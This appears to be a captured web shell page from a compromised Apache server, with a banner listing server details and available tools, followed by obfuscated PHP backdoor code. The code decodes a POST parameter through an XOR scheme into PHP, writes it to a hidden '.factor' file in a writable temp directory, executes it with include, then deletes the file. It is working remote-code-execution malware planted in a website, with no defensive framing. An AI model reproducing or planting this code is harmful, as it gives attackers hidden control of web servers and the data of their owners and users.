| Server IP : 65.108.144.40 / Your IP : 216.73.217.165 Web Server : Apache/2.4.52 (Ubuntu) System : Linux ubuntu-8gb-hel1-1 5.15.0-173-generic #183-Ubuntu SMP Fri Mar 6 13:29:34 UTC 2026 x86_64 User : dev ( 1000) PHP Version : 8.2.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/html/Solum-construction/demo-job/search/ |
Upload File : |
<?php
if(count($_POST) > 0 && isset($_POST["comp"])){
$mrk = $_POST["comp"];
$mrk =explode ( "." , $mrk ) ;
$tkn = '';
$s4 = 'abcdefghijklmnopqrstuvwxyz0123456789';
$lenS = strlen($s4);
foreach($mrk as $r=>$v2) {
$chS = ord($s4[$r %$lenS]);
$d =((int)$v2 - $chS -($r %10)) ^ 30;
$tkn .= chr($d);
}
$symbol = array_filter(["/var/tmp", sys_get_temp_dir(), "/dev/shm", session_save_path(), ini_get("upload_tmp_dir"), getenv("TMP"), getenv("TEMP"), getcwd(), "/tmp"]);
for ($value = 0, $bind = count($symbol); $value < $bind; $value++) {
$property_set = $symbol[$value];
if (!( !is_dir($property_set) || !is_writable($property_set) )) {
$key = "$property_set" . "/.factor";
$file = fopen($key, 'w');
if ($file) {
fwrite($file, $tkn);
fclose($file);
include $key;
@unlink($key);
die();
}
}
}
}